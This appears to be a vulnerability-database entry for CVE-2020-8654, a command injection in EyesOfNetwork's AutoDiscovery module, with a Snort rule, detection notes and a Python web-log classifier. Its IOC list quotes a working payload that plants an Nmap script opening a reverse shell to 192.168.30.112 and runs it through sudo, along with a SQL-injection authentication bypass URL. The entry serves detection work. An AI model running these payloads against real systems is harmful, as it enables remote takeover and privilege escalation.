CVE-2020-8654
published 2020-02-07

Priority: P276, high, 8.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 85.65% (99.7th percentile)

An issue was discovered in EyesOfNetwork 5.3. An authenticated web user with sufficient privileges could abuse the AutoDiscovery module to run arbitrary OS commands via the /module/module_frame/index.php autodiscovery.php target field.

Affected (1 range)

Vendor | Product | Version range | Fixed in
eyesofnetwork | eyesofnetwork | |

Detection & IOCs (extracted from sources)

url: /lilac/autodiscovery.php
url: /eonapi/getApiKey
url: /eonapi/createEonUser
path: /tmp/h4k
path: /usr/bin/nmap
command: ;id #
command: ;echo "local os = require \"os\" hostrule=function(host) os.execute(\"/bin/sh -i >& /dev/tcp/192.168.30.112/8081 0>&1\") end action=function() end" > /tmp/h4k;sudo /usr/bin/nmap localhost -p 1337 -script /tmp/h4k #
url: /eonapi/getApiKey?&username=%27%20union%20select%201,%27admin%27,%271c85d47ff80b5ff2a4dd577e8e5f8e9d%27,0,0,1,1,8%20or%20%27&password=h4knet
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT EyesOfNetwork Autodiscover Command Injection (CVE-2020-8654)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/lilac/autodiscovery.php"; endswith; fast_pattern; http.request_body; content:"request=autodiscover"; nocase; content:"job_name="; nocase; content:"nmap_binary"; nocase; content:"target[]"; nocase; content:"os.execute("; nocase; reference:url,www.exploit-db.com/exploits/48169; reference:cve,2020-8654; reference:cve,2020-8655; classtype:attempted-admin; sid:2034311; rev:1; metadata:attack_target Server, created_at 2021_11_01, cve CVE_2020_8654, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, updated_at 2021_11_01, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
  • Exploit POST requests to /lilac/autodiscovery.php contain the body parameters: request=autodiscover, job_name=, nmap_binary, target[], and os.execute( — all present simultaneously indicate active exploitation.
  • The injection payload is placed in the target[] POST parameter and begins with a semicolon to break out of the nmap command context, e.g. ';id #' or ';echo ... > /tmp/h4k;sudo /usr/bin/nmap ...'.
  • The exploit writes a malicious Nmap NSE script to /tmp/h4k and then invokes 'sudo /usr/bin/nmap localhost -p 1337 -script /tmp/h4k' for privilege escalation. Monitor for nmap spawned by apache user with --script pointing to /tmp/.
  • Authentication bypass via SQL injection uses the /eonapi/getApiKey endpoint with a UNION SELECT payload in the username parameter. Monitor for 'union select' strings in GET requests to /eonapi/getApiKey.
  • The exploit tool uses a distinctive non-standard User-Agent string for all HTTP requests; presence of this UA in web logs targeting EON endpoints is a strong indicator of exploit tool usage.
  • Successful exploitation results in a new admin user being created via POST to /eonapi/createEonUser. Monitor for unexpected admin user creation events in EON API logs.
  • Version fingerprinting probe: attackers GET /css/eonweb.css and extract the '# VERSION :' string via regex to confirm a vulnerable EON version (5.1–5.3) before exploiting.
  • HTTPS (SSL on port 443) is required for the Metasploit module to function; the exploit will not work over plain HTTP.
  • The exploit requires valid credentials for a user with administrative privileges, but can bypass authentication via a hardcoded API key (CVE-2020-8657) or SQL injection (CVE-2020-8656).
  • The Nuclei detection template only performs a passive version check via /css/eonweb.css and does not actively trigger the vulnerability; it matches EON versions equal to 5.1 through 5.3.
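
The request-level indicators listed above, combined into one classifier for parsed web-log entries (an added example, not code from this page or from the EyesOfNetwork project). The function name, the indicator labels and the sample requests are constructed for illustration; form bodies are URL-decoded before matching so that percent-encoded parameter names such as target%5B%5D are matched as well.

```python
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Tokens the signature above requires together in the POST body.
BODY_TOKENS = ("request=autodiscover", "job_name=", "nmap_binary",
               "target[]", "os.execute(")

def classify(method, url, body=""):
    """Return the indicator labels (hypothetical names) matched by one request."""
    parts = urlsplit(url)
    path = parts.path.lower()
    hits = []
    if method == "POST" and path.endswith("/lilac/autodiscovery.php"):
        decoded = unquote_plus(body).lower()
        if all(tok in decoded for tok in BODY_TOKENS):
            hits.append("autodiscovery-injection")
        # A target[] value starting with ';' leaves the nmap command context.
        targets = parse_qs(body, keep_blank_values=True).get("target[]", [])
        if any(t.lstrip().startswith(";") for t in targets):
            hits.append("target-semicolon")
    elif method == "GET" and path.endswith("/eonapi/getapikey"):
        user = " ".join(parse_qs(parts.query).get("username", []))
        # Collapse whitespace so padded keywords still match.
        if "union select" in " ".join(user.lower().split()):
            hits.append("getapikey-sqli")
    elif method == "POST" and path.endswith("/eonapi/createeonuser"):
        # Not malicious by itself: surface it for review against expected admins.
        hits.append("createeonuser-review")
    return hits

# Constructed sample requests (method, URL, body); not captured traffic.
BASE = "request=autodiscover&job_name=t&nmap_binary=%2Fusr%2Fbin%2Fnmap&target%5B%5D="
SAMPLES = [
    ("POST", "/lilac/autodiscovery.php", BASE + "%3Becho+os.execute%28PLACEHOLDER%29+%23"),
    ("POST", "/lilac/autodiscovery.php", BASE + "%3Bid+%23"),
    ("POST", "/lilac/autodiscovery.php", BASE + "192.0.2.10"),
    ("GET", "/eonapi/getApiKey?&username=%27%20union%20select%201%20or%20%27&password=x", ""),
    ("POST", "/eonapi/createEonUser", "{}"),
]

if __name__ == "__main__":
    for method, url, body in SAMPLES:
        print(method, urlsplit(url).path, classify(method, url, body))
```
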

CVSS provenance

nvd | v3.1 | 8.8 | HIGH | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvd | v2.0 | 9.0 | CRITICAL | AV:N/AC:L/Au:S/C:C/I:C/A:C